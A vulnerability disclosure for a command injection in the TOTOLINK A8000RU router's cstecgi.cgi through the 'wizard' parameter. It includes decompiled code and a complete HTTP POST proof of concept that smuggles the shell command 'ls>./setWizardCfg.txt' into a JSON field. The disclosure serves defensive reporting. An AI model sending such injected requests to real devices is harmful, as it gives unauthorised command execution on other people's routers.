# A8000RU Command Injection Vulnerability Summary ## Vulnerability Overview A command injection vulnerability was identified in the `cstecgi.cgi` component of the TOTOLINK A8000RU router. Attackers can execute arbitrary operating system commands by crafting malicious requests that exploit the `wizard` parameter. ## Affected Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu.643_b20200521 ## Remediation No specific remediation is currently provided on the vendor's page. It is recommended to contact the vendor to obtain updates or patches. ## Proof of Concept (PoC) ### Code Snippet ```c int v42; // [sp+9Ch] [-4h] memset(v20, 0, sizeof(v20)); var = websGetVar(a1, "proto", "1"); memset(v30, 0, sizeof(v30)); v0 = websGetVar(a1, "wizard", "0"); Uci_Set_Str(12, "main", "wizard", v0); Uci_Set_Str(29, "12tp", "enable", "0"); Uci_Set_Str(29, "ntp", "enable", "0"); if ( !strcmp(var, "0") ) { v5 = websGetVar(a1, "staticIp", ""); } ``` ### HTTP Request Example ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 72 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=21774537321:2 Connection: keep-alive {"topicUrl":"setWizardCfg","wizard":"ls>./setWizardCfg.txt"} ``` ### Result Upon submitting the above HTTP request, a `.txt` file was successfully created, containing the list of filenames from the directory. This confirms that the command `ls>./setWizardCfg.txt` was executed successfully.